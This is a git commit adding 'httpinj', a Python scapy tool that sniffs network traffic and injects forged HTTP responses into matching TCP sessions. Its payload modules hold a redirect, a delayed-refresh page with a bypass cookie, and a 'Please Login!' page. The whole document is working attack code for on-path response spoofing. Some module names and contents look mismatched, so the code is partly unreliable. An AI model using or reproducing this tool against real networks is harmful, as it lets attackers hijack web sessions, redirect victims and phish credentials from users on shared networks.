httpinj first commit

Author: l9c

.gitignore

@@ -0,0 +1,2 @@
+.idea/
+*.iml

httpinj.py

@@ -0,0 +1,106 @@
+#!/usr/bin/env python2.7
+
+import argparse
+from scapy.all import *
+import re
+import getopt
+import importlib
+
+
+# callback, called for each sniffed packet
+# Determine whether we should inject or not.
+def determine_packet(packet):
+    # print packet[IP].src, packet[IP].dst
+
+    try:
+        packet[TCP][Raw]
+    except IndexError:
+        return
+    else:
+
+        if re.search(regex, packet[TCP][Raw].load):
+            # print 'matched'
+            if payload_mod.payload.bypass_validate(packet[TCP][Raw].load):
+                return
+            inject_packet(packet)
+
+# Given a flagged packet, injects a packet
+def inject_packet (flagged_packet):
+
+    http_reponse = payload_mod.payload.http_payload()
+
+    # Spin up a new packet
+    to_inject = Ether()/IP()/TCP()/http_reponse
+    # Assign the packet its necessary values:
+    #Ether fields: flip the src and dst
+    to_inject[Ether].src = flagged_packet[Ether].dst
+    to_inject[Ether].dst = flagged_packet[Ether].src
+    # IP fields: flip src and dst, and increment ipid by some random amount
+    to_inject[IP].src = flagged_packet[IP].dst
+    to_inject[IP].dst = flagged_packet[IP].src
+    to_inject[IP].id = flagged_packet[IP].id + 112
+    # TCP fields: flip sport and dport, set ack and seq, set flags
+    to_inject[TCP].sport = flagged_packet[TCP].dport
+    to_inject[TCP].dport = flagged_packet[TCP].sport
+    to_inject[TCP].ack = len(flagged_packet[Raw]) + flagged_packet[TCP].seq
+    to_inject[TCP].seq = flagged_packet[TCP].ack
+    to_inject[TCP].flags = "PA"
+    # Delete ip length and chksum and tcp chksum so Scapy will recalculate them
+    del to_inject[IP].len
+    del to_inject[IP].chksum
+    del to_inject[TCP].chksum
+    # Send the packet!
+    sendp(to_inject, verbose=False)
+
+def main(argv):
+    global interface
+    global payload_mod
+    global regex
+
+    def printHelp():
+        print """
+        (python2.7 |./)httpinj [-i interface] [-r regexp] [-p payload] expression
+
+        -i --interface Listen on network device (defaults to eth0).
+
+        -r --regex Use regular expression to match the request packets for which a response will be spoofed.
+
+        -p --payloadname The payload name 
+
+        expression is a packet filter.
+
+        Defaults will be used for anything not provided.
+
+        eg: python httpinj.py -i eth0 -r "GET / HTTP/" -d example "tcp and port 80"
+        """
+
+    payloadname = 'example'
+    interface = 'eth0'
+    regex = r'^GET \/ HTTP\/1\.1'
+
+    try:
+        opts, args = getopt.getopt(argv[1:], 'i:r:p:h', ['interface=', 'regexp=', 'payloadname=', 'help'])
+    except getopt.GetoptError:
+        printHelp()
+        exit(64)
+
+    for opt, arg in opts:
+        if opt in ('-h', '--help'):
+            printHelp()
+            exit(0)
+        elif opt in ('-i', '--interface'):
+            interface = arg
+        elif opt in ('-r', '--regexp'):
+            regex = arg
+        elif opt in ('-p', '--payloadname'):
+            payloadname = arg
+        else:
+            printHelp()
+            exit(64)
+
+
+    payload_mod = importlib.import_module("payload." + payloadname)
+    sniff(iface=interface, filter=' '.join(args), prn=determine_packet)
+
+if __name__ == "__main__":
+    main(sys.argv)

payload/__init__.py

@@ -0,0 +1,20 @@
+class CommonPayload(object):
+    bypass_name = "httpinj_bp"
+    bypass_ttl = 10
+    content = ""
+    content_length = len(content)
+
+    @classmethod
+    def http_payload(cls):
+        header = "HTTP/1.1 200 OK\r\nServer: httpinj\r\nConnection: close\r\nContent-length: %s\r\n\r\n" % (cls.content_length)
+
+        return header + cls.content
+
+    @classmethod
+    def bypass_generate(cls):
+        return None
+
+    @classmethod
+    def bypass_validate(cls, raw):
+        return False
+

payload/common.py

@@ -0,0 +1,62 @@
+import time
+import zlib
+import re
+from common import *
+
+
+class payload(CommonPayload):
+    load_delay = 5
+    hash_secret = "change me"
+    bypass_name = "httpinj_bp"
+    bypass_ttl = 10
+    content = """
+    <html>
+    <body>
+    <h1>Loading...</h1>
+    </body>
+    </html>
+    """
+    content_length = len(content)
+
+    @classmethod
+    def http_payload(cls):
+        bypass_value = cls.bypass_generate()
+
+        header = "HTTP/1.1 200 OK\r\nServer: httpinj\r\nConnection: close\r\nContent-type: text/html\r\nRefresh: %s\r\nContent-length: %s\r\nSet-Cookie: %s=%s;path=/;Max-Age=%s\r\n\r\n" % (
+        cls.load_delay, cls.content_length, cls.bypass_name, bypass_value, cls.bypass_ttl)
+
+        return header + cls.content
+
+    @classmethod
+    def hash(cls, since, expire):
+        return str(zlib.crc32((cls.hash_secret + str(since) + str(expire)).encode()) & 0xffffffff)
+
+    @classmethod
+    def bypass_generate(cls):
+        ts = int(time.time())
+        time_since = ts + cls.load_delay
+        time_expire = ts + cls.bypass_ttl
+        return "%s-%s-%s" % (time_since, time_expire, cls.hash(time_since, time_expire))
+
+    @classmethod
+    def bypass_validate(cls, data):
+        m = re.search(cls.bypass_name + '=(\d{10})-(\d{10})-(\d{1,10})[;\s]', data)
+        if m and m.group(1) and m.group(2) and m.group(3):
+            time_since = m.group(1)
+            time_expire = m.group(2)
+            hash = m.group(3)
+            if cls.hash(time_since, time_expire) == hash:
+                # print "bypass window: %s~%s" % (time_since, time_expire)
+                now = time.time()
+                if int(time_since) <= now < int(time_expire):
+                    # print "bypassed"
+                    return True
+                else:
+                    # print "%s out of bypass window" % now
+                    return False
+
+            else:
+                # print "bad hash"
+                return False
+        else:
+            return False

payload/delayer.py

@@ -0,0 +1,12 @@
+from common import *
+
+class payload(CommonPayload):
+    content = """
+<html>
+<body>
+<h1>Example Payload</h1>
+</body>
+</html>
+"""
+    content_length = len(content)
+

payload/example.py

@@ -0,0 +1,10 @@
+from common import *
+
+class payload(CommonPayload):
+
+    @classmethod
+    def http_payload(cls):
+        header = "HTTP/1.1 302 Found\r\nServer: httpinj\r\nLocation: http://www.google.com\r\n\r\n"
+
+        return header + cls.content
+

payload/redirect.py

@@ -0,0 +1,13 @@
+# Note: This file is execed.
+content = """
+<html>
+<body>
+<h1>Please Login!</h1>
+</body>
+</html>
+"""
+header = "HTTP/1.1 200 OK\r\nServer: Undefined\r\nRefresh: 5; url=/?bp={bypass}\r\nConnection: close\r\nCache-Control: public, max-age=0\r\nContent-type: text/html\r\nContent-length: %s\r\n\r\n" % len(content)
+http_payload = {
+	'header': header,
+	'content': content
+}